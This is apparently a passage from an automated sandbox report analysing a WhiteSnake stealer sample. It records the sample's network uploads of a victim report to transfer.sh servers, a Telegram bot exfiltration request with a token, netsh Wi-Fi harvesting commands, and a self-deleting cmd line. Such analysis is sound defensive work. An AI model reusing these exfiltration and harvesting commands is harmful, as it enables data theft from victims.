                                                                                                                                                            Dec 8, 2024 13:02:02.793663979 CET21012OUTData Raw: e1 65 86 6b f8 88 62 fe 01 1e 8e 0d aa 95 60 32 1f f5 d7 54 cb 32 a3 b9 5c 0b 1c bc b7 2c c2 fa 9f 82 4e e3 24 5f 74 01 3a 51 d1 d9 01 2a 9d bf 86 56 48 58 39 29 0b 3a b3 6d cb c6 f6 b5 12 a4 be f0 72 f7 d3 02 28 aa 04 94 2a c7 c4 28 13 34 4e a2
                                                                                                                                                            Data Ascii: ekb`2T2\,N$_t:Q*VHX9):mr(*(4Nez#Ui{3n~QB5./pA.'wghZHJV99 et`h[hhwQ'7Sfr@!x"XaX&VdgH>!1a>A
                                                                                                                                                            Dec 8, 2024 13:02:02.793690920 CET1236OUTData Raw: b9 51 84 95 cb 5a e5 26 b8 55 a4 c1 bb 19 b3 68 36 fd a3 43 62 c3 b8 b8 8e 4e ef a7 db b3 17 1c f0 d0 1c ba 87 c7 74 95 e6 35 90 e5 00 11 0d ef fd be e7 16 16 b9 12 d2 d2 02 90 84 a1 5d a4 d6 c4 06 13 11 8b 1a 40 ed fe a0 4a 26 2f 93 c5 82 4e ab
                                                                                                                                                            Data Ascii: QZ&Uh6CbNt5]@J&/N=FIAAIKRv~??6BHgjFw;FaXu%KP@=GEp/k\~I$uOP[Gmk&.:v`d^v
                                                                                                                                                            Dec 8, 2024 13:02:02.913774967 CET12360OUTData Raw: d1 e1 34 1f 75 49 56 76 23 87 65 44 15 ff 2d f9 63 66 2c 95 3c 92 89 93 bc 3e af 71 06 78 75 2a ec bf 96 ff cd 7a db 36 72 ba 69 11 fa 26 9a bf 00 50 e5 97 97 b9 9f fd 1e cd 3e 4b 0b f0 54 42 69 88 f5 0c 7c fd bf 48 09 20 26 4b 5b 13 f3 35 5c d4
                                                                                                                                                            Data Ascii: 4uIVv#eD-cf,<>qxu*z6ri&P>KTBi|H &K[5\mSKD2"t7;E<q.y(>JWn#Qm%4"\zw}CLqJ]=%g5rC("X.cp)*I.%Cq.E-nL;&n"Y
                                                                                                                                                            Dec 8, 2024 13:02:02.956808090 CET28428OUTData Raw: 3d cc b1 cf af 5c 1f 53 0d b5 09 15 ad d7 63 29 1d 95 2f 2e 81 e4 dd 93 ee 93 f6 13 ac 06 35 f2 98 a8 86 bf 68 56 05 2e df 8a dd 7e 18 b2 8a b0 89 cb 76 9d f7 5c fd b0 6c 2f fc 02 84 6a c7 b8 08 74 14 cf 29 73 ac b4 27 b0 d7 f5 f0 9f 82 43 ec a6
                                                                                                                                                            Data Ascii: =\Sc)/.5hV.~v\l/jt)s'C"tXRi6!uv yClPEzY':b\}Z6C`6Wrtn!gYQJ':s_/ky UEp^R]B~{n
                                                                                                                                                            Dec 8, 2024 13:02:03.076611042 CET7416OUTData Raw: ef bc a4 b2 79 35 51 f3 6f bf 39 3a 3a 66 90 0e d1 b3 67 aa 88 70 18 df 82 b1 14 fa 81 22 a7 f4 5b 08 b6 f9 6e 8f 59 ee f3 bb 6c bb c0 2e fe 2d f6 02 e1 51 79 19 cb 8d 21 80 8b 20 7d dc f9 ff fb 99 70 9e e2 d2 35 cd 1d d6 66 b0 07 04 28 c9 75 4a
                                                                                                                                                            Data Ascii: y5Qo9::fgp"[nYl.-Qy! }p5f(uJ0$1rrE/8Vbg(~)Q4ec)4= _J`3TD @yj_r,U*TKE< f$z~H<>h?kxd,lXfehP!d~5YQmF
                                                                                                                                                            Dec 8, 2024 13:02:03.196350098 CET1236OUTData Raw: 0c 98 aa 13 63 ce 30 c2 5c 47 92 f7 9d 0c 72 ed e8 65 5b 53 cb 7d 27 bf d6 85 80 29 2c ff ef e8 67 75 79 ad 3e b6 c8 97 a6 17 75 a0 5d 16 d1 38 2a 2e 33 b9 e4 fa c2 bb d2 a3 88 91 3e fc 4b 7a ee 98 c7 2d 49 ca 3e de fc 2f b2 96 50 ef 93 ef a7 fe
                                                                                                                                                            Data Ascii: c0\Gre[S}'),guy>u]8*.3>Kz-I>/PQqIs:>C2+Srm lx`L"YU[OR|Nb*rYC!36ThBbl`@rKc43vwIao-_W[
                                                                                                                                                            Dec 8, 2024 13:02:03.300900936 CET48138OUTData Raw: 52 45 42 0d 44 ae 8b d5 2d a3 46 26 92 4e 12 e6 f4 7c b5 d5 17 a5 e0 29 78 dc 8f ba 02 c7 83 3d 13 12 3c 86 d4 01 66 b1 21 e2 d2 0e f0 e6 0e 60 9f 1c a5 87 3e e5 bb e7 8f 35 45 04 f2 31 ee f2 95 08 1a b9 da bb ba c2 58 b7 6b 06 89 ef 16 ee f6 2b
                                                                                                                                                            Data Ascii: REBD-F&N|)x=<f!`>5E1Xk+p_B|@a'XE;o'U}(LI2A`=ek\Caa:D+$fq<\7@:CCK]O6hats2S!Xbl+b^(OAA>
                                                                                                                                                            Dec 8, 2024 13:02:04.201113939 CET321INHTTP/1.1 500 Internal Server Error
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Server: Transfer.sh HTTP Server
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Made-With: <3 by DutchCoders
                                                                                                                                                            X-Served-By: Proudly served by DutchCoders
                                                                                                                                                            Date: Sun, 08 Dec 2024 12:02:04 GMT
                                                                                                                                                            Content-Length: 24
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a
                                                                                                                                                            Data Ascii: Could not save metadata


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.449734206.166.251.480807496C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2024 13:02:04.321546078 CET145OUTPUT /yrABY_user%40841618_report.wsr HTTP/1.1
                                                                                                                                                            Host: 206.166.251.4:8080
                                                                                                                                                            Content-Length: 134658
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.44974151.159.4.5080807496C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2024 13:02:26.341589928 CET143OUTPUT /yrABY_user%40841618_report.wsr HTTP/1.1
                                                                                                                                                            Host: 51.159.4.50:8080
                                                                                                                                                            Content-Length: 134658
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Dec 8, 2024 13:02:27.591255903 CET25INHTTP/1.1 100 Continue
                                                                                                                                                            Dec 8, 2024 13:02:28.197559118 CET376INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Server: Transfer.sh HTTP Server
                                                                                                                                                            X-Made-With: <3 by DutchCoders
                                                                                                                                                            X-Served-By: Proudly served by DutchCoders
                                                                                                                                                            X-Url-Delete: http://51.159.4.50:8080/3TJejBPXtn/yrABY_user@841618_report.wsr/RLhWMtp53nxXPwvrOIo0
                                                                                                                                                            Date: Sun, 08 Dec 2024 12:02:28 GMT
                                                                                                                                                            Content-Length: 64
                                                                                                                                                            Data Raw: 68 74 74 70 3a 2f 2f 35 31 2e 31 35 39 2e 34 2e 35 30 3a 38 30 38 30 2f 33 54 4a 65 6a 42 50 58 74 6e 2f 79 72 41 42 59 5f 6a 6f 6e 65 73 40 38 34 31 36 31 38 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                                                                                                            Data Ascii: http://51.159.4.50:8080/3TJejBPXtn/yrABY_user@841618_report.wsr


                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449742149.154.167.2204437496C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-12-08 12:02:29 UTC888OUTGET /bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2024-12-08 12:02:30 UTC389INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Sun, 08 Dec 2024 12:02:30 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 1079
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            2024-12-08 12:02:30 UTC1079INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 37 37 30 33 32 37 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 59 6f 75 70 69 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 59 6f 75 70 69 6f 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 36 38 34 34 39 34 30 33 2c 22 74 69 74 6c 65 22 3a 22 4d 61 69 6e 65 72 20 7c 20 4c 6f 67 73 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 36 35 39 33 35 30 2c 22 74 65 78 74 22 3a 22 23 43
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":1629,"from":{"id":7617703274,"is_bot":true,"first_name":"Youpio","username":"Youpio_bot"},"chat":{"id":-4568449403,"title":"Mainer | Logs","type":"group","all_members_are_administrators":true},"date":1733659350,"text":"#C


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:07:01:51
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\BA9qyj2c9G.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\BA9qyj2c9G.exe"
                                                                                                                                                            Imagebase:0x11852f50000
                                                                                                                                                            File size:167'424 bytes
                                                                                                                                                            MD5 hash:C9495B3A992EA3E2EF2788C7BA7ED840
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_WhiteSnake, Description: Yara detected WhiteSnake Stealer, Source: 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                            Imagebase:0x7ff607520000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x7ff6c0af0000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:netsh wlan show profiles
                                                                                                                                                            Imagebase:0x7ff60af60000
                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\findstr.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                                                                            Imagebase:0x7ff72bc60000
                                                                                                                                                            File size:36'352 bytes
                                                                                                                                                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                            Imagebase:0x7ff607520000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x7ff6c0af0000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                            Imagebase:0x7ff60af60000
                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:07:01:52
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\findstr.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:findstr "SSID BSSID Signal"
                                                                                                                                                            Imagebase:0x7ff72bc60000
                                                                                                                                                            File size:36'352 bytes
                                                                                                                                                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:07:02:29
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
                                                                                                                                                            Imagebase:0x7ff607520000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:07:02:29
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:07:02:29
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x7ff6c0af0000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:17
                                                                                                                                                            Start time:07:02:29
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:timeout /t 3
                                                                                                                                                            Imagebase:0x7ff757170000
                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:18.8%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:74.1%
                                                                                                                                                              Total number of Nodes:27
                                                                                                                                                              Total number of Limit Nodes:3
                                                                                                                                                              execution_graph 15450 7ffd9b727b5d 15451 7ffd9b727b69 CryptUnprotectData 15450->15451 15453 7ffd9b727c49 15451->15453 15454 7ffd9b726060 15457 7ffd9b722378 15454->15457 15456 7ffd9b726069 15457->15456 15458 7ffd9b726090 15457->15458 15459 7ffd9b7262bc LoadLibraryExW 15458->15459 15461 7ffd9b7261ab 15458->15461 15460 7ffd9b72631c 15459->15460 15460->15456 15461->15456 15466 7ffd9b72b2f5 15467 7ffd9b72b302 NtQueryInformationToken 15466->15467 15469 7ffd9b72b447 15467->15469 15470 7ffd9b72ed75 15471 7ffd9b72ed83 15470->15471 15472 7ffd9b72ed37 15471->15472 15473 7ffd9b72ee1f AdjustTokenPrivileges 15471->15473 15474 7ffd9b72eeef 15473->15474 15475 7ffd9b72b105 15476 7ffd9b72b057 15475->15476 15479 7ffd9b72b11c 15475->15479 15477 7ffd9b72b2d5 15478 7ffd9b72b38f NtQueryInformationToken 15480 7ffd9b72b447 15478->15480 15479->15477 15479->15478 15462 7ffd9b72e3e9 15463 7ffd9b72e40f NtClose 15462->15463 15465 7ffd9b72e4d5 15463->15465

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 00007FFD9B72EFEA Relevance: 2.8, Instructions: 2830COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2585139dac76058c3117204c8dbf4ad36c8bce2cfec963493643675e8677b4bb
                                                                                                                                                              • Instruction ID: c5591a8e6868dce0933a706297d693bdbbc70a5a736122c8cba4ba46b7dadda8
                                                                                                                                                              • Opcode Fuzzy Hash: 2585139dac76058c3117204c8dbf4ad36c8bce2cfec963493643675e8677b4bb
                                                                                                                                                              • Instruction Fuzzy Hash: B933FC70E09A1D8FDBA5EB18C8A4BA8B7B1FF55305F5101E9D00DE72A5DE35AA81CF40
                                                                                                                                                              Function 00007FFD9B722BA3 Relevance: 2.0, Instructions: 1969COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: be9452fe8525f47bf61c495f4371e4f8ea2c05ccde5a32ff4001b445b96a2391
                                                                                                                                                              • Instruction ID: e87c4c352914c93a4b0f80ddcaea3c099330386f3f3098df14d3759e604729d0
                                                                                                                                                              • Opcode Fuzzy Hash: be9452fe8525f47bf61c495f4371e4f8ea2c05ccde5a32ff4001b445b96a2391
                                                                                                                                                              • Instruction Fuzzy Hash: 5CD28030709A4D8FDB95EF68C4A4AA937E2FF59314B1502B9E44ECB2B6CE25ED01C750
                                                                                                                                                              Function 00007FFD9B72B105 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 979 7ffd9b72b105-7ffd9b72b11a 980 7ffd9b72b0b7-7ffd9b72b0ba 979->980 981 7ffd9b72b11c-7ffd9b72b12c 979->981 982 7ffd9b72b057-7ffd9b72b05a 980->982 983 7ffd9b72b0bc-7ffd9b72b0d1 980->983 988 7ffd9b72b12e-7ffd9b72b156 981->988 989 7ffd9b72b176-7ffd9b72b199 981->989 986 7ffd9b72b061-7ffd9b72b066 call 7ffd9b729ad8 982->986 987 7ffd9b72b05c 982->987 990 7ffd9b72b0d3 983->990 991 7ffd9b72b0d8-7ffd9b72b101 983->991 996 7ffd9b72b06b-7ffd9b72b0a1 call 7ffd9b729ac8 986->996 987->986 993 7ffd9b72b15d-7ffd9b72b174 988->993 994 7ffd9b72b158 988->994 1003 7ffd9b72b19c-7ffd9b72b1ea call 7ffd9b729d18 989->1003 990->991 993->989 994->993 1007 7ffd9b72b1f6-7ffd9b72b20d 1003->1007 1008 7ffd9b72b1ec-7ffd9b72b1f5 1003->1008 1007->1003 1009 7ffd9b72b20f-7ffd9b72b220 1007->1009 1008->1007 1011 7ffd9b72b2d6-7ffd9b72b2f2 1009->1011 1012 7ffd9b72b226-7ffd9b72b233 1009->1012 1015 7ffd9b72b235-7ffd9b72b25d 1012->1015 1016 7ffd9b72b28c 1012->1016 1024 7ffd9b72b266-7ffd9b72b287 1015->1024 1017 7ffd9b72b30d-7ffd9b72b445 NtQueryInformationToken 1016->1017 1018 7ffd9b72b28d 1016->1018 1036 7ffd9b72b44d-7ffd9b72b499 1017->1036 1037 7ffd9b72b447 1017->1037 1021 7ffd9b72b28e-7ffd9b72b298 call 7ffd9b729c58 1018->1021 1022 7ffd9b72b2d4 1018->1022 1028 7ffd9b72b29d-7ffd9b72b2cd 1021->1028 1023 7ffd9b72b2d5 1022->1023 1022->1024 1023->1011 1029 7ffd9b72b2f8-7ffd9b72b2ff 1024->1029 1030 7ffd9b72b289-7ffd9b72b28b 1024->1030 1028->1023 1038 7ffd9b72b2cf-7ffd9b72b2d2 1028->1038 1031 7ffd9b72b301 1029->1031 1032 7ffd9b72b302-7ffd9b72b305 1029->1032 1030->1016 1033 7ffd9b72b307 1030->1033 1031->1032 1032->1033 1033->1017 1037->1036 1038->1022
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1d1db920c5bfa46322f9d53f205e9628e39c297551c7d7455740928952009fd6
                                                                                                                                                              • Instruction ID: d507232e9c9b4453f81363fe51d46e0dbf4067790e6a57015dd066e58b91f860
                                                                                                                                                              • Opcode Fuzzy Hash: 1d1db920c5bfa46322f9d53f205e9628e39c297551c7d7455740928952009fd6
